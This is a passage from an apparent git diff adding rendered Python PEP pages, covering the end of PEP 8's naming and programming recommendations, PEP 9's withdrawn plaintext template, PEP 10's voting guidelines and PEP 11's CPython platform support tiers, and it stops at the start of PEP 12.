If a function argument’s name clashes with a reserved keyword, it is generally better to append a single trailing underscore rather than use an abbreviation or spelling corruption. Thus class_ is better than clss. (Perhaps better is to avoid such clashes by using a synonym.)
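
A brief sketch of these three conventions together (the class is invented for illustration):

class Widget:
    def __init__(self, class_=None):    # trailing underscore avoids the
        self.class_ = class_            # clash with the 'class' keyword

    def resize(self, width, height):    # 'self' first on instance methods
        self.width, self.height = width, height

    @classmethod
    def default(cls):                   # 'cls' first on class methods
        return cls()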

Method Names and Instance Variables

Use the function naming rules: lowercase with words separated by underscores as necessary to improve readability.

Use one leading underscore only for non-public methods and instance variables.

To avoid name clashes with subclasses, use two leading underscores to invoke Python’s name mangling rules.

Python mangles these names with the class name: if class Foo has an attribute named __a, it cannot be accessed by Foo.__a. (An insistent user could still gain access by calling Foo._Foo__a.) Generally, double leading underscores should be used only to avoid name conflicts with attributes in classes designed to be subclassed.
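
A minimal demonstration of the mangling rule (the class is invented for illustration):

class Foo:
    def __init__(self):
        self.__a = 42                   # stored on the instance as _Foo__a

f = Foo()
print(f._Foo__a)                        # 42 -- reachable, but clearly off limits
print(hasattr(f, '_Foo__a'), hasattr(f, '__a'))   # True False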

Note: there is some controversy about the use of __names (see below).

Constants

Constants are usually defined on a module level and written in all capital letters with underscores separating words. Examples include MAX_OVERFLOW and TOTAL.


Designing for Inheritance

Always decide whether a class’s methods and instance variables (collectively: “attributes”) should be public or non-public. If in doubt, choose non-public; it’s easier to make it public later than to make a public attribute non-public.

Public attributes are those that you expect unrelated clients of your class to use, with your commitment to avoid backwards incompatible changes. Non-public attributes are those that are not intended to be used by third parties; you make no guarantees that non-public attributes won’t change or even be removed.

We don’t use the term “private” here, since no attribute is really private in Python (without a generally unnecessary amount of work).

Another category of attributes are those that are part of the “subclass API” (often called “protected” in other languages). Some classes are designed to be inherited from, either to extend or modify aspects of the class’s behavior. When designing such a class, take care to make explicit decisions about which attributes are public, which are part of the subclass API, and which are truly only to be used by your base class.


With this in mind, here are the Pythonic guidelines:

  • Public attributes should have no leading underscores.
  • If your public attribute name collides with a reserved keyword, append a single trailing underscore to your attribute name. This is preferable to an abbreviation or corrupted spelling. (However, notwithstanding this rule, ‘cls’ is the preferred spelling for any variable or argument which is known to be a class, especially the first argument to a class method.)

    Note 1: See the argument name recommendation above for class methods.
  • For simple public data attributes, it is best to expose just the attribute name, without complicated accessor/mutator methods. Keep in mind that Python provides an easy path to future enhancement, should you find that a simple data attribute needs to grow functional behavior. In that case, use properties to hide functional implementation behind simple data attribute access syntax (see the sketch after this list).

    Note 1: Try to keep the functional behavior side-effect free, although side-effects such as caching are generally fine.

    Note 2: Avoid using properties for computationally expensive operations; the attribute notation makes the caller believe that access is (relatively) cheap.
  • If your class is intended to be subclassed, and you have attributes that you do not want subclasses to use, consider naming them with double leading underscores and no trailing underscores. This invokes Python’s name mangling algorithm, where the name of the class is mangled into the attribute name. This helps avoid attribute name collisions should subclasses inadvertently contain attributes with the same name.

    Note 1: Note that only the simple class name is used in the mangled name, so if a subclass chooses both the same class name and attribute name, you can still get name collisions.

    Note 2: Name mangling can make certain uses, such as debugging and __getattr__(), less convenient. However the name mangling algorithm is well documented and easy to perform manually.

    Note 3: Not everyone likes name mangling. Try to balance the need to avoid accidental name clashes with potential use by advanced callers.
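
As an illustration of the property guideline above (the class is invented for this sketch), a simple data attribute can later grow validation without changing the access syntax:

class Account:
    def __init__(self, balance=0):
        self._balance = balance

    @property
    def balance(self):
        return self._balance            # callers still write account.balance

    @balance.setter
    def balance(self, value):
        if value < 0:
            raise ValueError("balance cannot be negative")
        self._balance = value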

Public and Internal Interfaces

Any backwards compatibility guarantees apply only to public interfaces. Accordingly, it is important that users be able to clearly distinguish between public and internal interfaces.

Documented interfaces are considered public, unless the documentation explicitly declares them to be provisional or internal interfaces exempt from the usual backwards compatibility guarantees. All undocumented interfaces should be assumed to be internal.

To better support introspection, modules should explicitly declare the names in their public API using the __all__ attribute. Setting __all__ to an empty list indicates that the module has no public API.
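
A hypothetical module illustrating the convention (all names are invented):

"""frobmodule -- invented module for illustration."""

__all__ = ['connect']                   # the public API; [] would mean "none"

def connect(host):
    return _open_channel(host)

def _open_channel(host):                # internal: underscore, not in __all__
    ...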

Even with __all__ set appropriately, internal interfaces (packages, modules, classes, functions, attributes or other names) should still be prefixed with a single leading underscore.

An interface is also considered internal if any containing namespace (package, module or class) is considered internal.

Imported names should always be considered an implementation detail. Other modules must not rely on indirect access to such imported names unless they are an explicitly documented part of the containing module’s API, such as os.path or a package’s __init__ module that exposes functionality from submodules.

Programming Recommendations

  • Code should be written in a way that does not disadvantage other implementations of Python (PyPy, Jython, IronPython, Cython, Psyco, and such).

    For example, do not rely on CPython’s efficient implementation of in-place string concatenation for statements in the form a += b or a = a + b. This optimization is fragile even in CPython (it only works for some types) and isn’t present at all in implementations that don’t use refcounting. In performance sensitive parts of the library, the ''.join() form should be used instead. This will ensure that concatenation occurs in linear time across various implementations.
  • Comparisons to singletons like None should always be done with is or is not, never the equality operators.

    Also, beware of writing if x when you really mean if x is not None – e.g. when testing whether a variable or argument that defaults to None was set to some other value. The other value might have a type (such as a container) that could be false in a boolean context!
  • Use is not operator rather than not ... is. While both expressions are functionally identical, the former is more readable and preferred:

    # Correct:
    if foo is not None:

    # Wrong:
    if not foo is None:
  • When implementing ordering operations with rich comparisons, it is best to implement all six operations (__eq__, __ne__, __lt__, __le__, __gt__, __ge__) rather than relying on other code to only exercise a particular comparison.

    To minimize the effort involved, the functools.total_ordering() decorator provides a tool to generate missing comparison methods (a sketch follows this list).

    PEP 207 indicates that reflexivity rules are assumed by Python. Thus, the interpreter may swap y > x with x < y, y >= x with x <= y, and may swap the arguments of x == y and x != y. The sort() and min() operations are guaranteed to use the < operator and the max() function uses the > operator. However, it is best to implement all six operations so that confusion doesn’t arise in other contexts.
  • Always use a def statement instead of an assignment statement that binds a lambda expression directly to an identifier:

    # Correct:
    def f(x): return 2*x

    # Wrong:
    f = lambda x: 2*x

    The first form means that the name of the resulting function object is specifically ‘f’ instead of the generic ‘<lambda>’. This is more useful for tracebacks and string representations in general. The use of the assignment statement eliminates the sole benefit a lambda expression can offer over an explicit def statement (i.e. that it can be embedded inside a larger expression).
  • Derive exceptions from Exception rather than BaseException. Direct inheritance from BaseException is reserved for exceptions where catching them is almost always the wrong thing to do.

    Design exception hierarchies based on the distinctions that code catching the exceptions is likely to need, rather than the locations where the exceptions are raised. Aim to answer the question “What went wrong?” programmatically, rather than only stating that “A problem occurred” (see PEP 3151 for an example of this lesson being learned for the builtin exception hierarchy).

    Class naming conventions apply here, although you should add the suffix “Error” to your exception classes if the exception is an error. Non-error exceptions that are used for non-local flow control or other forms of signaling need no special suffix.
  • Use exception chaining appropriately. raise X from Y should be used to indicate explicit replacement without losing the original traceback (a sketch follows this list).

    When deliberately replacing an inner exception (using raise X from None), ensure that relevant details are transferred to the new exception (such as preserving the attribute name when converting KeyError to AttributeError, or embedding the text of the original exception in the new exception message).
  • When catching exceptions, mention specific exceptions whenever possible instead of using a bare except: clause:

    try:
        import platform_specific_module
    except ImportError:
        platform_specific_module = None

    A bare except: clause will catch SystemExit and KeyboardInterrupt exceptions, making it harder to interrupt a program with Control-C, and can disguise other problems. If you want to catch all exceptions that signal program errors, use except Exception: (bare except is equivalent to except BaseException:).

    A good rule of thumb is to limit use of bare ‘except’ clauses to two cases:

    1. If the exception handler will be printing out or logging the traceback; at least the user will be aware that an error has occurred.
    2. If the code needs to do some cleanup work, but then lets the exception propagate upwards with raise. try...finally can be a better way to handle this case.
  • When catching operating system errors, prefer the explicit exception hierarchy introduced in Python 3.3 over introspection of errno values.
  • Additionally, for all try/except clauses, limit the try clause to the absolute minimum amount of code necessary. Again, this avoids masking bugs:

    # Correct:
    try:
        value = collection[key]
    except KeyError:
        return key_not_found(key)
    else:
        return handle_value(value)

    # Wrong:
    try:
        # Too broad!
        return handle_value(collection[key])
    except KeyError:
        # Will also catch KeyError raised by handle_value()
        return key_not_found(key)
  • When a resource is local to a particular section of code, use a with statement to ensure it is cleaned up promptly and reliably after use. A try/finally statement is also acceptable.
  • Context managers should be invoked through separate functions or methods whenever they do something other than acquire and release resources:

    # Correct:
    with conn.begin_transaction():
        do_stuff_in_transaction(conn)

    # Wrong:
    with conn:
        do_stuff_in_transaction(conn)

    The latter example doesn’t provide any information to indicate that the __enter__ and __exit__ methods are doing something other than closing the connection after a transaction. Being explicit is important in this case.
  • Be consistent in return statements. Either all return statements in a function should return an expression, or none of them should. If any return statement returns an expression, any return statements where no value is returned should explicitly state this as return None, and an explicit return statement should be present at the end of the function (if reachable):

    # Correct:
    def foo(x):
        if x >= 0:
            return math.sqrt(x)
        else:
            return None

    def bar(x):
        if x < 0:
            return None
        return math.sqrt(x)

    # Wrong:
    def foo(x):
        if x >= 0:
            return math.sqrt(x)

    def bar(x):
        if x < 0:
            return
        return math.sqrt(x)
  • Use ''.startswith() and ''.endswith() instead of string slicing to check for prefixes or suffixes.

    startswith() and endswith() are cleaner and less error prone:

    # Correct:
    if foo.startswith('bar'):

    # Wrong:
    if foo[:3] == 'bar':
  • Object type comparisons should always use isinstance() instead of comparing types directly:

    # Correct:
    if isinstance(obj, int):

    # Wrong:
    if type(obj) is type(1):
  • For sequences (strings, lists, tuples), use the fact that empty sequences are false:

    # Correct:
    if not seq:
    if seq:

    # Wrong:
    if len(seq):
    if not len(seq):
  • Don’t write string literals that rely on significant trailing whitespace. Such trailing whitespace is visually indistinguishable and some editors (or more recently, reindent.py) will trim them.
  • Don’t compare boolean values to True or False using ==:

    # Correct:
    if greeting:

    # Wrong:
    if greeting == True:

    Worse:

    # Wrong:
    if greeting is True:
  • Use of the flow control statements return/break/continue within the finally suite of a try...finally, where the flow control statement would jump outside the finally suite, is discouraged. This is because such statements will implicitly cancel any active exception that is propagating through the finally suite:

    # Wrong:
    def foo():
        try:
            1 / 0
        finally:
            return 42
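
A minimal sketch of the functools.total_ordering() approach mentioned in the rich-comparisons item above (the class is invented for illustration):

from functools import total_ordering

@total_ordering
class Version:
    def __init__(self, major, minor):
        self.key = (major, minor)

    def __eq__(self, other):
        return self.key == other.key

    def __lt__(self, other):
        return self.key < other.key

# total_ordering derives __le__, __gt__ and __ge__ from the two above.
print(Version(3, 12) >= Version(3, 4))   # True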

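And a sketch of the exception-chaining guidance (the names are invented for illustration):

class ConfigError(Exception):
    pass

def read_port(settings):
    try:
        return settings['port']
    except KeyError as exc:
        # Replace the exception but keep the original traceback chained.
        raise ConfigError('missing setting: port') from exc
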
Function Annotations

With the acceptance of PEP 484, the style rules for function annotations have changed.

  • Function annotations should use PEP 484 syntax (there are some formatting recommendations for annotations in the previous section).
  • The experimentation with annotation styles that was recommended previously in this PEP is no longer encouraged.
  • However, outside the stdlib, experiments within the rules of PEP 484 are now encouraged. For example, marking up a large third party library or application with PEP 484 style type annotations, reviewing how easy it was to add those annotations, and observing whether their presence increases code understandability.
  • The Python standard library should be conservative in adopting such annotations, but their use is allowed for new code and for big refactorings.
  • For code that wants to make a different use of function annotations it is recommended to put a comment of the form:

    # type: ignore

    near the top of the file; this tells type checkers to ignore all annotations. (More fine-grained ways of disabling complaints from type checkers can be found in PEP 484.)
  • Like linters, type checkers are optional, separate tools. Python interpreters by default should not issue any messages due to type checking and should not alter their behavior based on annotations.
  • Users who don’t want to use type checkers are free to ignore them. However, it is expected that users of third party library packages may want to run type checkers over those packages. For this purpose PEP 484 recommends the use of stub files: .pyi files that are read by the type checker in preference of the corresponding .py files. Stub files can be distributed with a library, or separately (with the library author’s permission) through the typeshed repo [5].

Variable Annotations

PEP 526 introduced variable annotations. The style recommendations for them are similar to those on function annotations described above:

  • Annotations for module level variables, class and instance variables, and local variables should have a single space after the colon.
  • There should be no space before the colon.
  • If an assignment has a right hand side, then the equality sign should have exactly one space on both sides:

    # Correct:
    code: int

    class Point:
        coords: Tuple[int, int]
        label: str = '<unknown>'

    # Wrong:
    code:int  # No space after colon
    code : int  # Space before colon

    class Test:
        result: int=0  # No spaces around equality sign
  • Although PEP 526 is accepted for Python 3.6, the variable annotation syntax is the preferred syntax for stub files on all versions of Python (see PEP 484 for details).

Footnotes

[4] http://www.wikipedia.com/wiki/CamelCase
[5] Typeshed repo
    https://github.com/python/typeshed


Source: https://github.com/python/peps/blob/main/peps/pep-0008.rst


Last modified: 2024-09-09 14:02:27 GMT

diff --git a/pep-0009/index.html b/pep-0009/index.html
new file mode 100644
index 00000000000..d54a353077a
--- /dev/null
+++ b/pep-0009/index.html

PEP 9 – Sample Plaintext PEP Template

Author: Barry Warsaw <barry at python.org>
Status: Withdrawn
Type: Process
Created: 14-Aug-2001
Post-History:
Resolution: Python-Dev thread

Important


This PEP has been withdrawn.


As of 05-Jan-2016, this PEP is officially deprecated and replaced by PEP 12. All PEPs should now use the reStructuredText format described by PEP 12, and plaintext PEPs will no longer be accepted.


Abstract
    This PEP provides a boilerplate or sample template for creating
    your own plaintext PEPs.  In conjunction with the content
    guidelines in PEP 1 [1], this should make it easy for you to
    conform your own PEPs to the format outlined below.

    Note: if you are reading this PEP via the web, you should first
    grab the plaintext source of this PEP in order to complete the
    steps below.  DO NOT USE THE HTML FILE AS YOUR TEMPLATE!

    To get the source of this (or any) PEP, look at the top of the
    HTML page and click on the date & time on the "Last-Modified"
    line.  It is a link to the source text in the Python repository.

    If you would prefer to use lightweight markup in your PEP, please
    see PEP 12, "Sample reStructuredText PEP Template" [2].


Rationale

    PEP submissions come in a wide variety of forms, not all adhering
    to the format guidelines set forth below.  Use this template, in
    conjunction with the content guidelines in PEP 1, to ensure that
    your PEP submission won't get automatically rejected because of
    form.


How to Use This Template

    To use this template you must first decide whether your PEP is
    going to be an Informational or Standards Track PEP.  Most PEPs
    are Standards Track because they propose a new feature for the
    Python language or standard library.  When in doubt, read PEP 1
    for details or contact the PEP editors <peps@python.org>.

    Once you've decided which type of PEP yours is going to be, follow
    the directions below.

    - Make a copy of this file (.txt file, not HTML!) and perform the
      following edits.

    - Replace the "PEP: 9" header with "PEP: XXX" since you don't yet
      have a PEP number assignment.

    - Change the Title header to the title of your PEP.

    - Leave the Version and Last-Modified headers alone; we'll take
      care of those when we check your PEP into Python's Subversion
      repository.  These headers consist of keywords ("Revision" and
      "Date" enclosed in "$"-signs) which are automatically expanded
      by the repository.  Please do not edit the expanded date or
      revision text.

    - Change the Author header to include your name, and optionally
      your email address.  Be sure to follow the format carefully:
      your name must appear first, and it must not be contained in
      parentheses.  Your email address may appear second (or it can be
      omitted) and if it appears, it must appear in angle brackets.
      It is okay to obfuscate your email address.

    - If there is a mailing list for discussion of your new feature,
      add a Discussions-To header right after the Author header.  You
      should not add a Discussions-To header if the mailing list to be
      used is either python-list@python.org or python-dev@python.org,
      or if discussions should be sent to you directly.  Most
      Informational PEPs don't have a Discussions-To header.

    - Change the Status header to "Draft".

    - For Standards Track PEPs, change the Type header to "Standards
      Track".

    - For Informational PEPs, change the Type header to
      "Informational".

    - For Standards Track PEPs, if your feature depends on the
      acceptance of some other currently in-development PEP, add a
      Requires header right after the Type header.  The value should
      be the PEP number of the PEP yours depends on.  Don't add this
      header if your dependent feature is described in a Final PEP.

    - Change the Created header to today's date.  Be sure to follow
      the format carefully: it must be in dd-mmm-yyyy format, where
      the mmm is the 3 English letter month abbreviation, e.g. one of
      Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec.

    - For Standards Track PEPs, after the Created header, add a
      Python-Version header and set the value to the next planned
      version of Python, i.e. the one your new feature will hopefully
      make its first appearance in.  Do not use an alpha or beta
      release designation here.  Thus, if the last version of Python
      was 2.2 alpha 1 and you're hoping to get your new feature into
      Python 2.2, set the header to:

      Python-Version: 2.2

    - Leave Post-History alone for now; you'll add dates to this
      header each time you post your PEP to python-list@python.org or
      python-dev@python.org.  E.g. if you posted your PEP to the lists
      on August 14, 2001 and September 3, 2001, the Post-History
      header would look like:

      Post-History: 14-Aug-2001, 03-Sept-2001

      You must manually add new dates and check them in.  If you don't
      have check-in privileges, send your changes to the PEP editor.

    - Add a Replaces header if your PEP obsoletes an earlier PEP.  The
      value of this header is the number of the PEP that your new PEP
      is replacing.  Only add this header if the older PEP is in
      "final" form, i.e. is either Accepted, Final, or Rejected.  You
      aren't replacing an older open PEP if you're submitting a
      competing idea.

    - Now write your Abstract, Rationale, and other content for your
      PEP, replacing all this gobbledygook with your own text. Be sure
      to adhere to the format guidelines below, specifically on the
      prohibition of tab characters and the indentation requirements.

    - Update your References and Copyright section.  Usually you'll
      place your PEP into the public domain, in which case just leave
      the "Copyright" section alone.  Alternatively, you can use the
      Open Publication License [3], but public domain is still strongly
      preferred.

    - Leave the little Emacs turd at the end of this file alone,
      including the formfeed character ("^L", or \f).

    - Send your PEP submission to the PEP editors (peps@python.org),
      along with $100k in unmarked pennies.  (Just kidding, I wanted
      to see if you were still awake. :)


Plaintext PEP Formatting Requirements

    PEP headings must begin in column zero and the initial letter of
    each word must be capitalized as in book titles.  Acronyms should
    be in all capitals.  The body of each section must be indented 4
    spaces.  Code samples inside body sections should be indented a
    further 4 spaces, and other indentation can be used as required to
    make the text readable.  You must use two blank lines between the
    last line of a section's body and the next section heading.

    You must adhere to the Emacs convention of adding two spaces at
    the end of every sentence.  You should fill your paragraphs to
    column 70, but under no circumstances should your lines extend
    past column 79.  If your code samples spill over column 79, you
    should rewrite them.

    Tab characters must never appear in the document at all.  A PEP
    should include the standard Emacs stanza included by example at
    the bottom of this PEP.

    When referencing an external web page in the body of a PEP, you
    should include the title of the page in the text, with a
    footnote reference to the URL.  Do not include the URL in the body
    text of the PEP.  E.g.

        Refer to the Python Language web site [1] for more details.
        ...
        [1] http://www.python.org

    When referring to another PEP, include the PEP number in the body
    text, such as "PEP 1".  The title may optionally appear.  Add a
    footnote reference, a number in square brackets.  The footnote
    body should include the PEP's title and author.  It may optionally
    include the explicit URL on a separate line, but only in the
    References section.  Note that the pep2html.py script will
    calculate URLs automatically.  For example:

            ...
            Refer to PEP 1 [7] for more information about PEP style
            ...

        References

            [7] PEP 1, PEP Purpose and Guidelines, Warsaw, Hylton
                http://peps.python.org/pep-0001/

    If you decide to provide an explicit URL for a PEP, please use
    this as the URL template:

        http://peps.python.org/pep-xxxx/

    PEP numbers in URLs must be padded with zeros from the left, so as
    to be exactly 4 characters wide, however PEP numbers in the text
    are never padded.


References

    [1] PEP 1, PEP Purpose and Guidelines, Warsaw, Hylton
        http://peps.python.org/pep-0001/

    [2] PEP 12, Sample reStructuredText PEP Template, Goodger, Warsaw
        http://peps.python.org/pep-0012/

    [3] http://www.opencontent.org/openpub/


Copyright

    This document has been placed in the public domain.

Source: https://github.com/python/peps/blob/main/peps/pep-0009.rst


Last modified: 2024-04-14 20:08:31 GMT

diff --git a/pep-0010/index.html b/pep-0010/index.html
new file mode 100644
index 00000000000..5bf9ced5fa2
--- /dev/null
+++ b/pep-0010/index.html

PEP 10 – Voting Guidelines

Author: Barry Warsaw <barry at python.org>
Status: Active
Type: Process
Created: 07-Mar-2002
Post-History: 07-Mar-2002

Abstract

This PEP outlines the python-dev voting guidelines. These guidelines serve to provide feedback or gauge the “wind direction” on a particular proposal, idea, or feature. They don’t have a binding force.

Rationale

When a new idea, feature, patch, etc. is floated in the Python community, either through a PEP or on the mailing lists (most likely on python-dev [1]), it is sometimes helpful to gauge the community’s general sentiment. Sometimes people just want to register their opinion of an idea. Sometimes the BDFL wants to take a straw poll. Whatever the reason, these guidelines have been adopted so as to provide a common language for developers.

While opinions are (sometimes) useful, they are never binding. Opinions that are accompanied by rationales are always valued higher than bare scores (this is especially true with -1 votes).

Voting Scores

The scoring guidelines are loosely derived from the Apache voting procedure [2], with of course our own spin on things. There are 4 possible vote scores:

  • +1 I like it
  • +0 I don’t care, but go ahead
  • -0 I don’t care, so why bother?
  • -1 I hate it

You may occasionally see wild flashes of enthusiasm (either for or against) with vote scores like +2, +1000, or -1000. These aren’t really valued much beyond the above scores, but it’s nice to see people get excited about such geeky stuff.

References


Source: https://github.com/python/peps/blob/main/peps/pep-0010.rst


Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0011/index.html b/pep-0011/index.html
new file mode 100644
index 00000000000..161dd131767
--- /dev/null
+++ b/pep-0011/index.html

PEP 11 – CPython platform support

Author: Martin von Löwis <martin at v.loewis.de>, Brett Cannon <brett at python.org>
Status: Active
Type: Process
Created: 07-Jul-2002
Post-History: 18-Aug-2007, 14-May-2014, 20-Feb-2015, 10-Mar-2022

Abstract

This PEP documents how an operating system (platform) becomes supported in CPython, what platforms are currently supported, and documents past support.

Rationale

Over time, the CPython source code has collected various pieces of platform-specific code, which, at some point in time, was considered necessary to use CPython on a specific platform. Without access to this platform, it is not possible to determine whether this code is still needed. As a result, this code may either break during CPython’s evolution, or it may become unnecessary as the platforms evolve as well.

Allowing these fragments to grow poses the risk of unmaintainability: without having experts for a large number of platforms, it is not possible to determine whether a certain change to the CPython source code will work on all supported platforms.

To reduce this risk, this PEP specifies what is required for a platform to be considered supported by CPython as well as providing a procedure to remove code for platforms with few or no CPython users.

This PEP also lists what platforms are supported by the CPython interpreter. This lets people know what platforms are directly supported by the CPython development team.

Support tiers

Platform support is broken down into tiers. Each tier comes with different requirements which lead to different promises being made about support.

To be promoted to a tier, steering council support is required and is expected to be driven by team consensus. Demotion to a lower tier occurs when the requirements of the current tier are no longer met for a platform for an extended period of time based on the judgment of the release manager or steering council. For platforms which no longer meet the requirements of any tier by b1 of a new feature release, an announcement will be made to warn the community of the pending removal of support for the platform (e.g. in the b1 announcement). If the platform is not brought into line for at least one of the tiers by the first release candidate, it will be listed as unsupported in this PEP.

Tier 1

  • STATUS
  • CI failures block releases.
  • Changes which would break the main branch are not allowed to be merged; any breakage should be fixed or reverted immediately.
  • All core developers are responsible to keep main, and thus these platforms, working.
  • Failures on these platforms block a release.

    Target Triple              Notes
    aarch64-apple-darwin       clang
    i686-pc-windows-msvc
    x86_64-pc-windows-msvc
    x86_64-apple-darwin        BSD libc, clang
    x86_64-unknown-linux-gnu   glibc, gcc

Tier 2

  • STATUS
  • Must have a reliable buildbot.
  • At least two core developers are signed up to support the platform.
  • Changes which break any of these platforms are to be fixed or reverted within 24 hours.
  • Failures on these platforms block a release.

    Target Triple               Notes                Contacts
    aarch64-unknown-linux-gnu   glibc, gcc           Petr Viktorin, Victor Stinner
                                glibc, clang         Victor Stinner, Gregory P. Smith
    wasm32-unknown-wasip1       WASI SDK, Wasmtime   Brett Cannon, Eric Snow
    x86_64-unknown-linux-gnu    glibc, clang         Victor Stinner, Gregory P. Smith

Tier 3

  • STATUS
  • Must have a reliable buildbot.
  • At least one core developer is signed up to support the platform.
  • No response SLA to failures.
  • Failures on these platforms do not block a release.

    Target Triple                    Notes                         Contacts
    aarch64-linux-android                                          Russell Keith-Magee, Petr Viktorin
    aarch64-pc-windows-msvc                                        Steve Dower
    arm64-apple-ios                  iOS on device                 Russell Keith-Magee, Ned Deily
    arm64-apple-ios-simulator        iOS on M1 macOS simulator     Russell Keith-Magee, Ned Deily
    armv7l-unknown-linux-gnueabihf   Raspberry Pi OS, glibc, gcc   Gregory P. Smith
    powerpc64le-unknown-linux-gnu    glibc, clang                  Victor Stinner
                                     glibc, gcc                    Victor Stinner
    s390x-unknown-linux-gnu          glibc, gcc                    Victor Stinner
    x86_64-linux-android                                           Russell Keith-Magee, Petr Viktorin
    x86_64-unknown-freebsd           BSD libc, clang               Victor Stinner

All other platforms

Support for a platform may be partial within the code base, such as from active development around platform support or accidentally. Code changes to platforms not listed in the above tiers may be rejected or removed from the code base without a deprecation process if they cause a maintenance burden or obstruct general improvements.

Platforms not listed here may be supported by the wider Python community in some way. If your desired platform is not listed above, please perform a search online to see if someone is already providing support in some form.

Notes


Microsoft Windows

Windows versions prior to Windows 10 follow Microsoft’s Fixed Lifecycle Policy, with a mainstream support phase for 5 years after release, where the product is generally commercially available, and an additional 5 year extended support phase, where paid support is still available and certain bug fixes are released. Extended Security Updates (ESU) is a paid program available to high-volume enterprise customers as a “last resort” option to receive certain security updates after extended support ends. ESU is considered a distinct phase that follows the expiration of extended support.

Windows 10 and later follow Microsoft’s Modern Lifecycle Policy, which varies per-product, per-version, per-edition and per-channel. Generally, feature updates (1709, 22H2) occur every 6-12 months and are supported for 18-36 months; Server and IoT editions, and LTSC channel releases are supported for 5-10 years, and the latest feature release of a major version (Windows 10, Windows 11) generally receives new updates for at least 10 years following release. Microsoft’s Windows Lifecycle FAQ has more specific and up-to-date guidance.

CPython’s Windows support currently follows Microsoft’s lifecycles. A new feature release X.Y.0 will support all Windows versions whose extended support phase has not yet expired. Subsequent bug fix releases will support the same Windows versions as the original feature release, even if no longer supported by Microsoft. New versions of Windows released while CPython is in maintenance mode may be supported at the discretion of the core team and release manager.

As of 2024, our current interpretation of Microsoft’s lifecycles is that Windows for IoT and embedded systems is out of scope for new CPython releases, as the intent of those is to avoid feature updates. Windows Server will usually be the oldest version still receiving free security fixes, and that will determine the earliest supported client release with equivalent API version (which will usually be past its end-of-life).

Each feature release is built by a specific version of Microsoft Visual Studio. That version should have mainstream support when the release is made. Developers of extension modules will generally need to use the same Visual Studio release; they are concerned both with the availability of the versions they need to use, and with keeping the zoo of versions small. The CPython source tree will keep unmaintained build files for older Visual Studio releases, for which patches will be accepted. Such build files will be removed from the source tree 3 years after the extended support for the compiler has ended (but continue to remain available in revision control).

Legacy C Locale

Starting with CPython 3.7.0, *nix platforms are expected to provide at least one of C.UTF-8 (full locale), C.utf8 (full locale) or UTF-8 (LC_CTYPE-only locale) as an alternative to the legacy C locale.

Any Unicode-related integration problems that occur only in the legacy C locale and cannot be reproduced in an appropriately configured non-ASCII locale will be closed as “won’t fix”.

Unsupporting platforms

If a platform drops out of tiered support, a note must be posted in this PEP that the platform is no longer actively supported. This note must include:
  • The name of the system,
  • The first release number that does not support this platform anymore, and
  • The first release where the historical support code is actively removed.

In some cases, it is not possible to identify the specific list of systems for which some code is used (e.g. when autoconf tests for absence of some feature which is considered present on all supported systems). In this case, the name will give the precise condition (usually a preprocessor symbol) that will become unsupported.

At the same time, the CPython build must be changed to produce a warning if somebody tries to install CPython on this platform. On platforms using autoconf, configure should also be made to emit a warning about the unsupported platform.

This gives potential users of the platform a chance to step forward and offer maintenance. We do not treat a platform that loses Tier 3 support any worse than a platform that was never supported.

No-longer-supported platforms

  • Name: MS-DOS, MS-Windows 3.x
    Unsupported in: Python 2.0
    Code removed in: Python 2.1

  • Name: SunOS 4
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: DYNIX
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: dgux
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: Minix
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: Irix 4 and --with-sgi-dl
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: Linux 1
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: Systems defining __d6_pthread_create (configure.in)
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: Systems defining PY_PTHREAD_D4, PY_PTHREAD_D6, or PY_PTHREAD_D7 in thread_pthread.h
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: Systems using --with-dl-dld
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: Systems using --without-universal-newlines
    Unsupported in: Python 2.3
    Code removed in: Python 2.4

  • Name: MacOS 9
    Unsupported in: Python 2.4
    Code removed in: Python 2.4

  • Name: Systems using --with-wctype-functions
    Unsupported in: Python 2.6
    Code removed in: Python 2.6

  • Name: Win9x, WinME, NT4
    Unsupported in: Python 2.6 (warning in 2.5 installer)
    Code removed in: Python 2.6

  • Name: AtheOS
    Unsupported in: Python 2.6 (with “AtheOS” changed to “Syllable”)
    Build broken in: Python 2.7 (edit configure to re-enable)
    Code removed in: Python 3.0

  • Name: BeOS
    Unsupported in: Python 2.6 (warning in configure)
    Build broken in: Python 2.7 (edit configure to re-enable)
    Code removed in: Python 3.0

  • Name: Systems using Mach C Threads
    Unsupported in: Python 3.2
    Code removed in: Python 3.3

  • Name: SunOS lightweight processes (LWP)
    Unsupported in: Python 3.2
    Code removed in: Python 3.3

  • Name: Systems using --with-pth (GNU pth threads)
    Unsupported in: Python 3.2
    Code removed in: Python 3.3

  • Name: Systems using Irix threads
    Unsupported in: Python 3.2
    Code removed in: Python 3.3

  • Name: OSF* systems (issue 8606)
    Unsupported in: Python 3.2
    Code removed in: Python 3.3

  • Name: OS/2 (issue 16135)
    Unsupported in: Python 3.3
    Code removed in: Python 3.4

  • Name: VMS (issue 16136)
    Unsupported in: Python 3.3
    Code removed in: Python 3.4

  • Name: Windows 2000
    Unsupported in: Python 3.3
    Code removed in: Python 3.4

  • Name: Windows systems where COMSPEC points to command.com
    Unsupported in: Python 3.3
    Code removed in: Python 3.4

  • Name: RISC OS
    Unsupported in: Python 3.0 (some code actually removed)
    Code removed in: Python 3.4

  • Name: IRIX
    Unsupported in: Python 3.7
    Code removed in: Python 3.7

  • Name: Systems without multithreading support
    Unsupported in: Python 3.7
    Code removed in: Python 3.7

  • Name: wasm32-unknown-emscripten
    Unsupported in: Python 3.13
    Code removed in: Unknown

Discussions


Source: https://github.com/python/peps/blob/main/peps/pep-0011.rst

+

Last modified: 2024-11-07 21:53:03 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0012/index.html b/pep-0012/index.html new file mode 100644 index 00000000000..7ded9e06125 --- /dev/null +++ b/pep-0012/index.html @@ -0,0 +1,964 @@ PEP 12 – Sample reStructuredText PEP Template | peps.python.org
+
+

+
+
+

PEP 12 – Sample reStructuredText PEP Template

+
+
Author:
+
